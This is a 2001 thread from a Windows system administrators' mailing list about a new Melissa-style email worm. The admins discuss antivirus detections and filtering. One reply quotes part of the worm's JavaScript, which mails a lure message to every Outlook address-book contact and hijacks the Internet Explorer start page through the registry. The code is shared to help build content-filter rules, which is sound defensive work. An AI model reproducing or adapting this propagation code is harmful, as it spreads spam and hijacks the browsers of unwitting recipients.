RE: New Worm on the loose

Mon, 27 Aug 2001 15:35:51 -0700 

I would assume the following JS may be a good place to start:

if(WShl.RegRead("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
Page") == "http://pccontrol.tripod.com/";)
{return(0);}
ta=ol.GetNameSpace("MAPI").AddressLists.count;
for(a=1;a<=ta;++a){
        tb=ol.GetNameSpace("MAPI").AddressLists(a).AddressEntries.count;
        for(b=1;b<=tb;++b){
                try{
                Mail=ol.CreateItem(0);
        
Mail.to=ol.GetNameSpace("MAPI").AddressLists(a).AddressEntries(b);
                Mail.Subject="Hi !";
                Mail.Body="Hi, how are you ? I am fine here. Please read the
page http://pcControl.tripod.com/ to get some knowledge and prevent somebody
hack you. Forword this mail to help all your friends too.";
                Mail.Send;
                }
                catch(e){}
        }
}
}
function WriteRegMain()
{
if(WShl.RegRead("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
Page") != "http://pccontrol.tripod.com/";)
{WShl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
Page","http://pccontrol.tripod.com/";);}

Regards,
 
Sean Martin, MCSE
Network Administrator
Ribelin Lowell & Company
Insurance Brokers, Inc.
3111 C Street, Suite 300
Anchorage, Alaska 99503
Ph: (907) 561-1250
Fax: (907) 561-4315
Cell: (907) 229-0885
Email: [EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]> 


-----Original Message-----
From: Dean Cunningham [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 2:59 PM
To: NT System Admin Issues
Subject: RE: New Worm on the loose


William may well of triggered some of your AV products off with a reply to
this message.
It contained the javascript associated with the page.
******Even tho it was benign ******
William *did not* send you a virus.

The email made our McAfee detect it as a VBS/Generic@MM virus against a scan
engine of 4.1.40 and a dat of 4155 set for heuristic scanning. mcafee is
being a bit sensitive (and rightly so)

MaAfee refers to it as VBS/Loding.a@MM (even tho the 4155 dat refers to it
as VBS/Generic@MM)
http://vil.nai.com/vil/virusSummary.asp?virus_k=99185

worse still, also there is JS/Offensive 
http://vil.nai.com/vil/virusSummary.asp?virus_k=99189

probably a mutation

can anyone tell me the key bit of java script so I can use my content filter
(Mimesweeper) to block the mutations.

regards
Dean

-----Original Message-----
From: Stu Sjouwerman [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, 28 August 2001 10:50 a.m.
To: NT System Admin Issues
Subject: RE: New Worm on the loose


It sure is out there, I already got a bunch.

Stu



> -----Original Message-----
> From: Jay Woody [mailto:[EMAIL PROTECTED]]
> Sent: Monday, August 27, 2001 5:48 PM
> To: NT System Admin Issues
> Subject: Re: New Worm on the loose
> 
> 
> Is there a subject line?
> 
> JayW
> 
> >>> [EMAIL PROTECTED] 08/27/01 03:46PM >>>
> Sorry about the cross posting.
> 
> We don't have a lot of specifics on it, but there appears to be a new worm
> on the loose. The payload is a typical Melissa-style worm, where its only
> action is to send mail to all members of the GAL, with the following
> message:
> "Hi, how are you ? I am fine here. Please read the page
> http://pcControl.tripod.com/ to get some knowledge and prevent somebody
hack
> you. Forword this mail to help all your friends too."
> 
> Its plain text, and carries no executables with it, but I haven't visited
> the website yet. More info to follow, but there is zero information on the
> web about it at this point.
> 
> Roger
> ------------------------------------------------------
> Roger D. Seielstad - MCSE MCT
> Senior Systems Administrator
> Peregrine Systems
> Atlanta, GA
> http://www.peregrine.com 
> 
> 
> http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
> 
> 
> 
> http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
***************************************************
This e-mail is  not an  official  statement of  the
Waikato  Regional  Council unless otherwise stated.
Visit our website http://www.ew.govt.nz
***************************************************

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
DO NOT read, copy or disseminate this communication unless you are the
intended addressee. This e-mail communication contains confidential and/or
privileged information intended only for the addressee. If you have received
this communication in error, please call us immediately at (907) 561-1250
and ask to speak to the sender of the communication. Also, please e-mail the
sender and notify the sender immediately that you have received the
communication in error.

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

Reply via email to